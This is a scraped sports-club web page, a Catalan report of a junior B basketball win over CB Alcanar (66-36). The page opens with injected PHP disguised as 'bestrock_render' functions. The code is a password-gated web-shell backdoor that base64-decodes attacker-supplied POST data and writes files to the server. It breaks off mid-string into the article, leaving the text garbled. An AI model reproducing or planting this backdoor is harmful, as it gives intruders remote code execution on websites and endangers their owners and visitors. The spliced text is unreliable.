function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior masculí B afina la punteria i derrota el CB Alcanar (66-36) - Tgn Bàsquet Club -

El júnior masculí B afina la punteria i derrota el CB Alcanar (66-36)

Updated: gener 31, 2017

El júniormasculí B va derrotar el CB Alcanar en un partit en què va demostrar la seva punteria, especialment en el tir exterior i personalitat en Pere Jove (4 triples dels 8 del seu equip). Així, després d’uns primers minuts d’igualtat, la bona defensa dels locals va deixar en només 2 punts els visitants en el primer quart. A partir d’aleshores, el tir exterior va ser el protagonista. L’Alcanar es va situar en una zona 2-3 que va ser trencada pels tiradors lila. Només la relaxació defensiva en alguns moments va evitar una diferència més gran.